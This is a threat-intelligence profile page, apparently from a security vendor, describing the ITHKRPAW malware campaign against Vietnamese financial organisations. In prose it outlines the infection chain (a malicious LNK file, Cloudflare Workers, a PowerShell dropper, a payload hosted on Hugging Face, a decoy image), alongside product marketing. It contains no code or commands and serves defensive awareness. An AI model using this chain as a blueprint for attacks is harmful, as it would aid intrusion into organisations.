ITHKRPAW

Also known asITHKRPAW

ITHKRPAW is a malware delivery campaign identified by Acronis TRU in January targeting organizations in Vietnam, particularly the financial sector. The campaign used a malicious LNK file to invoke Cloudflare Workers, which served a PowerShell dropper. That dropper fetched a payload from a Hugging Face dataset repository, saved it as microsoft-update-assist.exe in the victim's temporary directory, and opened a benign cat image as a decoy to mask activity. Supporting reporting states the downloaded payload was omni-agent-v4.exe. Researchers assessed with moderate confidence that the PowerShell script was LLM-generated based on embedded Vietnamese-language comments. The activity was described in the context of broader abuse of trusted AI platforms, specifically Hugging Face, as staging and payload-hosting infrastructure for multi-stage malware infection chains. No additional aliases or sub-groups beyond ITHKRPAW are provided in the source content.

Are they targeting you?

Know when an actor pivots toward your sector

Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.

Start free trial

OPERATIONAL PROFILE

Targeting

Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.

Who they target

Sectors the actor has been observed targeting.

Financials

Where they target

Geographies tied to known operations.

🇻🇳 Vietnam

ACTIVITY FEED

Recent activity

2 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

2 SOURCESView more in app

cyber security newsNews

May 8, 2026

Hackers Leveraged Hugging Face and ClawHub With 575+ Malicious Skills to Deploy Malware

Campaign abusing Hugging Face repositories as staging infrastructure to target Vietnamese financial organizations with a multi-stage infection chain.

acronis blogNews

Apr 30, 2026

Poisoning the well: AI supply chain attacks on Hugging Face and OpenClaw

Malware delivery campaign abusing Hugging Face repositories and Cloudflare Workers to stage and drop payloads disguised as benign files, including a fake update assistant, with targeting focused on financial-sector organizations and entities in Vietnam.

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: sector and geo overlap with your footprint, the IOCs they’re burning right now, detection coverage, and what to do next.

Start free trial

Target overlap

Match sector + geo + tech-stack targeting against your real footprint.

Tradecraft mapping

Every observed MITRE ATT&CK technique, grouped by tactic.

Malware arsenal

Families this actor is known to deploy, with IOCs and behavior.

Exploited CVEs

CVEs this actor has used in known campaigns.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

Observables

Domains, IPs, and hashes tied to this actor, refreshed continuously.